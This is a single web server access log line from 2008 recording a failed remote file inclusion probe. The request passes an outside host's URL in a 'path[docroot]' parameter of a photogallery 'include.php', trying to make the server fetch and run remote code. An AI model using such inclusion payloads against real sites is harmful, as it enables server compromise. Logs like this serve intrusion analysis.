89.238.65.54 - - [07/Aug/2008:12:11:50 -0700] "GET /logs/access_071215.log//oneadmin/photogallery/include.php?path[docroot]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
